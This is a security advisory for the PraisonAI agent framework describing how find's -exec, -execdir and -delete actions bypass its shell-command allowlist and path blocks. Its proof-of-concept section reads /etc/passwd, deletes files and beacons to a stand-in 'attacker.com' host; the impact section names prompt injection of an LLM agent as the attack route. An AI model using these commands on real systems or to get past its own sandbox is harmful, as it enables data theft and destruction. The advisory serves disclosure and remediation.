GHSA-CV3G-HJ65-PCFH
Vulnerability from github – Published: 2026-10-08 22:00 – Updated: 2026-10-08 22:00Summary
The shell command execution hardening introduced in PraisonAI npm 1.7.2 / Python 4.6.58 to fix GHSA-5jv7-2mjm-h6qj (utility-tools shell chaining) and GHSA-vjv9-7m7j-h833 (SandboxExecutor chaining) can be bypassed via find's built-in -exec action.
The fix blocks shell metacharacters (;|&`><$()${}) and uses spawn() with shell: false. However, find remains in the safe command allowlist, and its -exec ... {} + action executes commands without shell metacharacters — the + batch terminator replaces the blocked ; terminator. The same gap exists in 4 parallel implementations (verified by source inspection of each).
Details
Root cause: Each of the four implementations validates the first token of the command against an allowlist or blocklist, then passes the remaining tokens as arguments to spawn()/subprocess.Popen() with shell: false. Shell metacharacter injection is indeed blocked.
However, find is a Unix command with built-in execution actions: -exec, -execdir, -delete, -ok, -okdir. These actions are interpreted by find itself, not by the shell. They execute programs or delete files without shell metacharacters (verified: the payload find /etc -name passwd -maxdepth 1 -execdir cat {} + passes the regex at line 240 of utility-tools.ts):
find /path -exec <command> {} +
The + terminator (batch mode) avoids ; which IS blocked by the metacharacter regex.
Affected components (4 implementations, same gap):
| # | Component | File | Gap |
|---|---|---|---|
| 1 | TS utility-tools shell() |
src/praisonai-ts/src/tools/utility-tools.ts:255 |
find in safeCommands allowlist |
| 2 | TS SandboxExecutor | src/praisonai-ts/src/cli/features/sandbox-executor.ts:30-50 |
find absent from DEFAULT_BLOCKED_COMMANDS |
| 3 | Python safe_shell |
src/praisonai/praisonai/cli/features/safe_shell.py:22-58 |
find absent from BANNED_COMMANDS, present in SAFE_COMMANDS |
| 4 | Python sandbox_executor |
src/praisonai/praisonai/cli/features/sandbox_executor.py:87-91 |
find absent from blocked_commands |
Bypass analysis:
| Check | find /etc -name passwd -maxdepth 1 -execdir cat {} + |
Result |
|---|---|---|
Metachar regex /[;|&\><]/|{,},+` are not in regex |
PASS | |
Regex /\$\([^)]*\)/ |
No $(...) |
PASS |
safeCommands.includes('find') |
find IS in allowlist |
PASS |
| SandboxExecutor blocked paths | normalized.includes('/etc/passwd') → FALSE (path split: /etc + passwd) |
PASS |
spawn('find', [...], {shell:false}) |
find interprets -execdir internally |
BYPASS |
The -execdir technique also evades the SandboxExecutor's substring-based path restriction: /etc and passwd appear as separate arguments, so /etc/passwd never appears as a contiguous substring of the command string.
Preconditions:
| Precondition | How attacker obtains | Default? |
|---|---|---|
Access to shell() or SandboxExecutor |
Default built-in tool in the npm agent toolkit; reachable via prompt injection | Y |
find binary on target |
Standard Unix utility, present on Linux/macOS | Y |
find in allowlist / absent from blocklist |
Default configuration in each implementation | Y |
PoC
1. Data exfiltration via -execdir (utility-tools.ts)
const { shell } = require('praisonai/dist/tools/utility-tools');
async function poc() {
// Control: direct 'wget' is rejected (not in safeCommands)
const control = await shell('wget http://example.com');
console.log('[CONTROL] rejected:', !control.success); // true
// Bypass: find -execdir reads /etc/passwd via find's built-in action
const bypass = await shell('find /etc -name passwd -maxdepth 1 -execdir cat {} +');
console.log('[BYPASS]:', bypass.success); // true
console.log(bypass.data); // root:x:0:0:root:/root:/bin/bash ...
}
poc();
Code path: safeCommands.includes('find') → true → containsShellMetacharacters(...) → false → spawn('find', ['/etc','-name','passwd','-maxdepth','1','-execdir','cat','{}','+'], {shell:false}) → find chdirs to /etc → cat ./passwd → exit 0 → {success: true, data: "<passwd contents>"}.
2. File deletion
await shell('find /app/uploads -name "*.bak" -delete');
// -delete is a find built-in — clean exit 0, files deleted
3. Non-allowlisted command (side-effect based)
await shell('find /tmp -maxdepth 0 -exec wget -q http://attacker.com/beacon {} +');
// HTTP request fires as side effect before find returns non-zero
4. Python safe_shell
from praisonai.cli.features.safe_shell import safe_execute
result = safe_execute("find /etc -name passwd -maxdepth 1 -execdir cat {} +")
print(result.stdout) # root:x:0:0:root:/root:/bin/bash ...
Impact
An attacker who can influence the command parameter of shell() (via prompt injection directing an LLM agent, or direct API input to SandboxExecutor) achieves:
- Blocked file read:
-execdirreads files inDEFAULT_BLOCKED_PATHSby splitting the path across arguments (verified: exit 0, data returned) - File deletion:
-deletedestroys files without metacharacters (verified: clean exit 0) - Non-allowlisted command execution:
-execruns commands not in safeCommands (side effect fires regardless of exit code)
Shell substitution ($(...)) IS blocked, so the bypass is limited to executing binaries already on disk — but this includes cat, chmod, python3, curl etc.
Same severity class as GHSA-5jv7-2mjm-h6qj / GHSA-vjv9-7m7j-h833.
Suggested fix
Option A: Remove find from each safe/allowed command list (4 locations). Simplest fix.
Option B: If find must remain, parse arguments and reject -exec, -execdir, -delete, -fls, -fprint, -fprintf, -ok, -okdir flags.
Regression tests:
test('rejects find -exec', async () => {
expect((await shell('find /tmp -maxdepth 0 -exec wget http://x.com {} +')).success).toBe(false);
});
test('rejects find -execdir', async () => {
expect((await shell('find /etc -name passwd -maxdepth 1 -execdir cat {} +')).success).toBe(false);
});
test('rejects find -delete', async () => {
expect((await shell('find /app -name "*.bak" -delete')).success).toBe(false);
});
References
- GHSA-5jv7-2mjm-h6qj: Utility shell safe-command wrapper allowlist bypass via shell chaining (High 8.8)
- GHSA-vjv9-7m7j-h833: SandboxExecutor allowedCommands bypass via shell chaining (High)
- Fix commits: 2adfe7e, 2f9677a (2026-06-13)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.77"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.78"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-61434"
],
"database_specific": {
"cwe_ids": [
"CWE-693",
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-08T22:00:55Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe shell command execution hardening introduced in PraisonAI npm 1.7.2 / Python 4.6.58 to fix GHSA-5jv7-2mjm-h6qj (utility-tools shell chaining) and GHSA-vjv9-7m7j-h833 (SandboxExecutor chaining) can be bypassed via `find`\u0027s built-in `-exec` action.\n\nThe fix blocks shell metacharacters (`` ;|\u0026`\u003e\u003c$()${} ``) and uses `spawn()` with `shell: false`. However, `find` remains in the safe command allowlist, and its `-exec ... {} +` action executes commands without shell metacharacters \u2014 the `+` batch terminator replaces the blocked `;` terminator. The same gap exists in 4 parallel implementations (verified by source inspection of each).\n\n### Details\n\n**Root cause**: Each of the four implementations validates the **first token** of the command against an allowlist or blocklist, then passes the remaining tokens as arguments to `spawn()`/`subprocess.Popen()` with `shell: false`. Shell metacharacter injection is indeed blocked.\n\nHowever, `find` is a Unix command with **built-in execution actions**: `-exec`, `-execdir`, `-delete`, `-ok`, `-okdir`. These actions are interpreted by `find` itself, not by the shell. They execute programs or delete files without shell metacharacters (verified: the payload `find /etc -name passwd -maxdepth 1 -execdir cat {} +` passes the regex at line 240 of utility-tools.ts):\n\n```\nfind /path -exec \u003ccommand\u003e {} +\n```\n\nThe `+` terminator (batch mode) avoids `;` which IS blocked by the metacharacter regex.\n\n**Affected components** (4 implementations, same gap):\n\n| # | Component | File | Gap |\n|---|---|---|---|\n| 1 | TS utility-tools `shell()` | `src/praisonai-ts/src/tools/utility-tools.ts:255` | `find` in `safeCommands` allowlist |\n| 2 | TS SandboxExecutor | `src/praisonai-ts/src/cli/features/sandbox-executor.ts:30-50` | `find` absent from `DEFAULT_BLOCKED_COMMANDS` |\n| 3 | Python `safe_shell` | `src/praisonai/praisonai/cli/features/safe_shell.py:22-58` | `find` absent from `BANNED_COMMANDS`, present in `SAFE_COMMANDS` |\n| 4 | Python `sandbox_executor` | `src/praisonai/praisonai/cli/features/sandbox_executor.py:87-91` | `find` absent from `blocked_commands` |\n\n**Bypass analysis**:\n\n| Check | `find /etc -name passwd -maxdepth 1 -execdir cat {} +` | Result |\n|---|---|---|\n| Metachar regex `/[;|\u0026\\`\u003e\u003c]/` | `{`, `}`, `+` are not in regex | PASS |\n| Regex `/\\$\\([^)]*\\)/` | No `$(...)` | PASS |\n| `safeCommands.includes(\u0027find\u0027)` | `find` IS in allowlist | PASS |\n| SandboxExecutor blocked paths | `normalized.includes(\u0027/etc/passwd\u0027)` \u2192 FALSE (path split: `/etc ` + `passwd`) | PASS |\n| `spawn(\u0027find\u0027, [...], {shell:false})` | find interprets `-execdir` internally | BYPASS |\n\nThe `-execdir` technique also evades the SandboxExecutor\u0027s substring-based path restriction: `/etc` and `passwd` appear as separate arguments, so `/etc/passwd` never appears as a contiguous substring of the command string.\n\n**Preconditions**:\n\n| Precondition | How attacker obtains | Default? |\n|---|---|---|\n| Access to `shell()` or SandboxExecutor | Default built-in tool in the npm agent toolkit; reachable via prompt injection | Y |\n| `find` binary on target | Standard Unix utility, present on Linux/macOS | Y |\n| `find` in allowlist / absent from blocklist | Default configuration in each implementation | Y |\n\n### PoC\n\n**1. Data exfiltration via -execdir (utility-tools.ts)**\n\n```javascript\nconst { shell } = require(\u0027praisonai/dist/tools/utility-tools\u0027);\n\nasync function poc() {\n // Control: direct \u0027wget\u0027 is rejected (not in safeCommands)\n const control = await shell(\u0027wget http://example.com\u0027);\n console.log(\u0027[CONTROL] rejected:\u0027, !control.success); // true\n\n // Bypass: find -execdir reads /etc/passwd via find\u0027s built-in action\n const bypass = await shell(\u0027find /etc -name passwd -maxdepth 1 -execdir cat {} +\u0027);\n console.log(\u0027[BYPASS]:\u0027, bypass.success); // true\n console.log(bypass.data); // root:x:0:0:root:/root:/bin/bash ...\n}\npoc();\n```\n\nCode path: `safeCommands.includes(\u0027find\u0027)` \u2192 true \u2192 `containsShellMetacharacters(...)` \u2192 false \u2192 `spawn(\u0027find\u0027, [\u0027/etc\u0027,\u0027-name\u0027,\u0027passwd\u0027,\u0027-maxdepth\u0027,\u00271\u0027,\u0027-execdir\u0027,\u0027cat\u0027,\u0027{}\u0027,\u0027+\u0027], {shell:false})` \u2192 find chdirs to /etc \u2192 `cat ./passwd` \u2192 exit 0 \u2192 `{success: true, data: \"\u003cpasswd contents\u003e\"}`.\n\n**2. File deletion**\n\n```javascript\nawait shell(\u0027find /app/uploads -name \"*.bak\" -delete\u0027);\n// -delete is a find built-in \u2014 clean exit 0, files deleted\n```\n\n**3. Non-allowlisted command (side-effect based)**\n\n```javascript\nawait shell(\u0027find /tmp -maxdepth 0 -exec wget -q http://attacker.com/beacon {} +\u0027);\n// HTTP request fires as side effect before find returns non-zero\n```\n\n**4. Python safe_shell**\n\n```python\nfrom praisonai.cli.features.safe_shell import safe_execute\n\nresult = safe_execute(\"find /etc -name passwd -maxdepth 1 -execdir cat {} +\")\nprint(result.stdout) # root:x:0:0:root:/root:/bin/bash ...\n```\n\n### Impact\n\nAn attacker who can influence the command parameter of `shell()` (via prompt injection directing an LLM agent, or direct API input to SandboxExecutor) achieves:\n\n- **Blocked file read**: `-execdir` reads files in `DEFAULT_BLOCKED_PATHS` by splitting the path across arguments (verified: exit 0, data returned)\n- **File deletion**: `-delete` destroys files without metacharacters (verified: clean exit 0)\n- **Non-allowlisted command execution**: `-exec` runs commands not in safeCommands (side effect fires regardless of exit code)\n\nShell substitution (`$(...)`) IS blocked, so the bypass is limited to executing binaries already on disk \u2014 but this includes `cat`, `chmod`, `python3`, `curl` etc.\n\nSame severity class as GHSA-5jv7-2mjm-h6qj / GHSA-vjv9-7m7j-h833.\n\n### Suggested fix\n\n**Option A**: Remove `find` from each safe/allowed command list (4 locations). Simplest fix.\n\n**Option B**: If `find` must remain, parse arguments and reject `-exec`, `-execdir`, `-delete`, `-fls`, `-fprint`, `-fprintf`, `-ok`, `-okdir` flags.\n\n**Regression tests**:\n```typescript\ntest(\u0027rejects find -exec\u0027, async () =\u003e {\n expect((await shell(\u0027find /tmp -maxdepth 0 -exec wget http://x.com {} +\u0027)).success).toBe(false);\n});\ntest(\u0027rejects find -execdir\u0027, async () =\u003e {\n expect((await shell(\u0027find /etc -name passwd -maxdepth 1 -execdir cat {} +\u0027)).success).toBe(false);\n});\ntest(\u0027rejects find -delete\u0027, async () =\u003e {\n expect((await shell(\u0027find /app -name \"*.bak\" -delete\u0027)).success).toBe(false);\n});\n```\n\n### References\n\n- GHSA-5jv7-2mjm-h6qj: Utility shell safe-command wrapper allowlist bypass via shell chaining (High 8.8)\n- GHSA-vjv9-7m7j-h833: SandboxExecutor allowedCommands bypass via shell chaining (High)\n- Fix commits: 2adfe7e, 2f9677a (2026-06-13)",
"id": "GHSA-cv3g-hj65-pcfh",
"modified": "2026-10-08T22:00:55Z",
"published": "2026-10-08T22:00:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cv3g-hj65-pcfh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-61434"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/praisonai-before-allowlist-bypass-via-find-exec"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Shell command allowlist bypass via find -exec built-in action"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.